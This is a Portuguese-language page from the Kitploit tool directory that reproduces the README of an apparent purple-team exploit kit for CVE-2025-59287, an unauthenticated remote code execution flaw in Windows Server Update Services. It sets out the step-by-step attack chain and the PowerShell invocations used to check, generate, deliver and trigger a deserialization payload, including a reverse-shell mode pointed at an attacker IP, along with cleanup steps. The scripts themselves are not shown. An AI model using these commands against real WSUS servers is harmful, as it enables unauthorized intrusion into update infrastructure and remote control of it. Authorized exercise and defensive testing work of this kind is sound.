Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59287-Exercise-Use — Scripts de exercício de equipe roxa demonstrando CVE-2025-59287, um RCE não autenticado no WSUS via injeção de payload de desserialização maliciosa no banco de dados do WSUS. | Kitploit
Ferramentas/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de PayloadsLabs e Prática
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

Scripts de exercício de equipe roxa demonstrando CVE-2025-59287, um RCE não autenticado no WSUS via injeção de payload de desserialização maliciosa no banco de dados do WSUS.

Ver Repositório
2há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59287 — RCE não autenticado no WSUS

Scripts de exercício de time roxo para o CVE-2025-59287, uma vulnerabilidade de execução remota de código não autenticada no Windows Server Update Services (WSUS).

Uso autorizado apenas. Para uso em ambientes de exercício controlados contra sistemas que você possui ou tem permissão explícita por escrito para testar.

Como Funciona

A vulnerabilidade abusa de endpoints SOAP do WSUS acessíveis anonimamente para injetar um payload malicioso de desserialização no banco de dados do WSUS. O payload é executado quando o console administrativo do WSUS é aberto ou uma sincronização é acionada.

  1. O serviço de autenticação do WSUS emite um token válido para qualquer cliente anônimo
  2. O token é trocado por um cookie de sessão de relatório através do serviço web do cliente
  3. Um objeto serializado malicioso é injetado no banco de dados do WSUS através do serviço de relatório
  4. O payload é executado quando o console do WSUS carrega ou um evento de sincronização é disparado

Requisitos

  • Caixa de ataque Windows com PowerShell 5.1+
  • Acesso de rede ao WSUS na porta 8530
  • ysoserial.net colocado na pasta ysoserial\Release\ (consulte Configuração)

Estrutura do Repositório

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

Configuração

Clone ou baixe o repositório. Adicione o ysoserial.net para que o caminho corresponda a ysoserial\Release\ysoserial.exe.

Baixe o ysoserial.net de: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 Isso acionará o Windows Defender por padrão.

Uso

Execute todos os scripts a partir da raiz do repositório.

1 — Verificar

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — Gerar

File drop (no listener needed, recommended first):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

Reverse shell:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — Entregar

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — Acionar

No servidor WSUS, abra o console administrativo via Iniciar > Windows Server Update Services, ou acione uma sincronização via PowerShell:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — Verificar e Limpar

Verificar execução:

root@kitploit:~
.\4-verify.ps1

Verificar e limpar todos os artefatos:

root@kitploit:~
.\4-verify.ps1 -Cleanup

Da caixa de ataque via compartilhamento administrativo:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

Após a limpeza, remova o computador do exercício do console do WSUS em Computadores.

Oportunidades de Detecção

Referências

  • CVE-2025-59287 — Pesquisa original: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
Baixar ferramenta